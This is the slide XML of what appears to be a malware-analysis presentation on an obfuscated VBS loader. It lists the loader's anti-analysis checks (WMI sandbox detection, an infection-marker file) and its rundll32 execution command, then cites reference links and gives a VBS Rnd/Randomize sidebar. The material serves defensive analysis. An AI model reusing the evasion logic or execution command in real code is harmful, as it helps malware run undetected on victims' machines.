              <a:t>If the VBS has full path of %USERPROFILE%\Downloads\82984.txt, then this is the Threat Actor testing the script – only pop calc.exe, nothing malicious</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If %TMP%\adobe.url exists, this host is already infected, end the VBS script and delete it.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All of the WMI things we just discussed, to determine if the victim host appears to be an analysis VM</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T1218.011 - Signed Binary Proxy Execution: Rundll32</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rundll32 %TMP%\racial.drc, DllRegisterServer</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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524" name="Shape 524"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Google Shape;525;p8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526" name="Google Shape;526;p8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dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Definition of Polymorphism - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Polymorphic_code</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VirusTotal hit for the first file hash - https://www.virustotal.com/gui/file/77e706f98b1e4fe48a4a1631b27529dc587aeab2d187322439d3b5a726da2f80</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Pyramid of Pain - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html</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VBS "rnd" function - https://www.w3schools.com/asp/func_rnd.asp</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"Russian Dolls VBS Obfuscation" article by Xavier Mertens - https://isc.sans.edu/diary/Russian+Dolls+VBS+Obfuscation/27494</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MalwareBazaar has the sample available for download - https://bazaar.abuse.ch/sample/2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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530" name="Shape 530"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Google Shape;531;p8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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Google Shape;532;p8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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VBS "lbound()" function - https://www.w3schools.com/asp/func_lbound.asp</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VBS "ubound()" function - https://www.w3schools.com/asp/func_ubound.asp</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VB "rnd" and "randomize" - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/rnd-function</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MalwareBazaar hits for the ImpHash - https://bazaar.abuse.ch/browse.php?search=imphash%3A3bfdfe7fdedde57f8d113c7e630bd750</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mandiant definition of ImpHash - https://www.mandiant.com/resources/tracking-malware-import-hashing</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fantastic article on using Imports in static malware analysis - https://medium.com/mrx-007/basic-static-analysis-of-malware-and-common-dll-ef9455d49968</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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536" name="Shape 536"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Google Shape;537;p8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3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="Google Shape;538;p8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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"connect()" function - https://docs.microsoft.com/en-us/windows/win32/api/Winsock2/nf-winsock2-connect</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ws2_32.dll functions - https://docs.microsoft.com/en-us/windows/win32/winsock/winsock-functions</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another fantastic article on static malware analysis - https://nasbench.medium.com/malware-analysis-techniques-basic-static-analysis-335a7286a176</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LoadLibrary function - https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexw</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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542" name="Shape 542"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p8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4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p8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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="17"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example of LoadLibrary used in malware - https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="17"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"GetSpecialFolder" - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/getspecialfolder-method</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod" startAt="17"/>
            </a:pPr>
            <a:r>
              <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Sidebar #1 - Rnd</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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>'Randomize</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>wscript.echo(Rnd)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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Note that Randomize is commented out for this example:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;cscript rnd1.vbs //x</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>0.7055475</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;cscript rnd1.vbs //x</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>0.7055475</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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Without Randomize, we get the same value every time.  Also note 7 decimal places (we'll come back to this later)</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Sidebar #1 - continued</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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If we enable "Randomize", we get different values each time we run:</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&gt;cscript rnd1.vbs //x</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0.6858332</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&gt;cscript rnd1.vbs //x</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0.8016779</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&gt;cscript rnd1.vbs //x</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0.1454889</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